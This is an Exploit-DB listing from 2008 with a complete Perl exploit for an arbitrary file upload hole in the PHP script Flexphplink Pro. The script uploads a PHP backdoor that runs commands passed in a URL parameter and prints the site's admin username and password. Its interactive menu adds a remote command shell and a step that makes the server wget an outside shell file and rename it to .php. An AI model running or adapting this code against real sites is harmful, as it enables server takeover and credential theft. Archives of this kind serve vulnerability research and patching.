Flexphplink Pro - Arbitrary File Upload

EDB-ID:

7600


Author:

Osirys

Type:

webapps


Platform:

PHP

Date:

2008-12-28


#!/usr/bin/perl

# HAPPY CHRISTMAS !!
# Flexphplink Pro
# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1
# Bug: Arbitrary File Upload
# * I coded this exploit just for fun ;)
# Exploit coded by Osirys
# osirys[at]live[dot]it
# http://osirys.org
# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX

# Example:
# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/
#   ============================
#      Flexphplink Pro Exploit
#       Coded by Osirys
#       osirys[at]live[dot]it
#       Proud to be italian
#   ============================
# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise:
#     1 - Admin Details Disclosure
#     2 - Arbitrary Command Execution
#     3 - Shell upload
#     4 - Exit
# 1
# [+] Extracting Admin Login Details .
# [+] Done:
#     Username: admin
#     Password: adminz
# osirys[~]>$


use HTTP::Request;
use LWP::UserAgent;


my $path   =  "/submitlink.php";
my $u_path =  "/linkphoto/";
my $l_file =  "back.php";

my $code   =  "<?php  echo \"<b>RCE backdoor</b><br><br>\";if(!empty(\$_GET['cmd'])&&empty".
              "(\$_GET['adm'])){echo\"<b>CMD: </b>\";system(\$_GET['cmd']);}elseif((\$_GET".
              "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )".
              "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl".
              "ude ('../const.inc.php');}echo \"<b>Username: </b>\$admin_username\";  echo".
              "\"<br>\";     echo   \"<b>Password: </b>\$admin_password\";   }          ?>";

my $host   = $ARGV[0];

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

open  ($file, ">", $l_file);
print  $file  "$code\n";
close ($file);

$dir = `pwd`;
my $f_path = $dir."/".$l_file;
$f_path =~ s/\n//;

my $url  = $host.$path;
my $ua   = LWP::UserAgent->new;
$time = time();
my $post = $ua->post($url,
                      Content_Type => 'form-data',
                      Content      => [
                                         title    => 'abco',
                                         url      => 'def',
                                         userfile => [$f_path, '.php'],
                                         addlink  => 'Add'
                                      ]
                    );

if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) {
    `rm -rf $f_path`;
    cheek_fname($time);
    ($rcefile) || die "[-] Unable to find phpscript uploaded\n";
    &go;
}
else {
    print "[-] Unable to upload evil php-code !\n";
    exit(0);
}

sub go() {
    my $error = $_[0];
    if ($error == -1) {
        print "[-] Bad Choice\n\n";
    }
    elsif ($error == -2) {
        print "[-] Bad shell url\n\n";
    }
    print "[+] $host backdoored, just type your choise:\n".
          "    1 - Admin Details Disclosure\n".
          "    2 - Arbitrary Command Execution\n".
          "    3 - Shell upload\n".
          "    4 - Exit\n";

    $choice = <STDIN>;
    $choice =~ /1|2|3|4/ || go("-1");
    if ($choice == 1) {
        &adm_disc;
    }
    elsif ($choice == 2) {
        &exec_cmd;
    }
    elsif ($choice == 3) {
        &shell_up;
    }
    elsif ($choice == 4) {
        print "[-] Quitting ..\n";
        exit(0);
    }
}

sub adm_disc {
    print "[+] Extracting Admin Login Details ..\n";
    $exec_url = ($host.$u_path.$time.".php?adm=get");
    $re = query($exec_url);
    if ($re =~ /Username: <\/b>(.*)<br><b>Password: <\/b>(.*)/) {
        my($user,$pass) = ($1,$2);
        print "[+] Done:          \n".
              "    Username: $user\n".
              "    Password: $pass\n";
    }
    else {
        print "[-] Can't extract Admin Details.\n\n";
        &go;
    }
} 

sub exec_cmd {
    print "shell\$>\n";
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd);
    $re = query($exec_url);
    if ($re =~ /<b>CMD: <\/b>(.*)/) {
        print "[*] $1\n";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !\n";
        &exec_cmd;
    }
}

sub shell_up {
    print "[+] Type now a link for your .txt shell\n".
          "    Shell name must be with .txt extension\n";
    $s_link = <STDIN>;
    $s_link =~ /.*\/(.*)\.txt/ || &go("-2");
    $s_name = $1;
    $exec_url  = ($host.$u_path.$time.".php?cmd=wget ".$s_link);
    $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php");
    query($exec_url); query($exec_url2);
    print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n";
}

sub cheek_fname() {
    my $time = $_[0];
    my $name = $time.".php";
    $re = query($host.$u_path.$name);
    if ($re =~ /<b>RCE backdoor<\/b>/) {
        $rcefile = $name;
        return;
    }
}

sub query() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub banner {
    print "\n".
          "  ============================ \n".
          "     Flexphplink Pro Exploit   \n".
          "      Coded by Osirys          \n".
          "      osirys[at]live[dot]it    \n".
          "      Proud to be italian      \n".
          "  ============================ \n\n";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Cheek that you provide a hostname address!\n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}

# milw0rm.com [2008-12-28]